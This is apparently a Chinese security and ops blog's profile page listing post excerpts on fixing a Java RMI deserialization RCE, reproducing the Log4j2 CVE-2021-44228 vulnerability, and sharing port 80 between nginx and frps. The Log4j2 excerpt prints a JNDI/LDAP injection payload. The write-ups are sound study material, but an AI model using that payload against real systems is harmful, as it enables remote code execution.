沉默乌龟的博客_ASP编程,Nginx,Photoshop教程,运维,网络安全,rmi反序列化导致rce漏洞修复领域博主

沉默乌龟

文章

资源

加入时间

3年1月16天

rmi反序列化导致rce漏洞修复_记一次Java反序列化漏洞的发现和修复

作者：bit4@勾陈安全0x00 背景简介本文是自己对一次反序列化漏洞的发现和修复过程，如有错误请斧正，大神请轻喷。目标应用系统是典型的CS模式。客户端是需要安装的windows桌面程序，但是它是大部分内容都是基于Java开发(安装目录有很多Jar包)。服务端是基于Jboss开发。客户端和服务端之间的通信流量是序列化了的数据流量。客户端接收和解析数据流量的模式和服务端一样，也是通过http服务，它...

rmi反序列化导致rce漏洞修复 2024-07-12 37 点赞 0 评论 56 浏览

安全漏洞之Log4j2漏洞复现绕过分析

0x00 介绍Log4j2是Java开发常用的日志框架，该漏洞触发条件低，危害大，由阿里云安全团队报告分配CVE编号：CVE-2021-44228CVSS评分：10.0（最高只能10分）POC比较简单public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}");}POC虽然简单，但是搭建LDAP环境显

网络安全 2024-07-11 36 点赞 0 评论 54 浏览

八、frps服务端与nginx可共用80端口

我的服务器，已经用nginx 做网站了，80端口只有一个，我还想我的frps一起使用，可以吗？这个是可以实现的，利用nginx的反向代理实现。以下是在frps服务器上安装的nginx配置文件中设置的，不是在客户端中配置的在nginx.conf中http{}里添加以下参数server { listen 80; server_name *.123.com; #换成自己的域名...

运维 2023-11-01 50 点赞 0 评论 75 浏览

他的专栏

ASP编程（0）

Nginx（0）

Photoshop教程（0）

运维（1）

网络安全（1）

rmi反序列化导致rce漏洞修复（1）

他的归档

2024年07月（2）

2023年11月（1）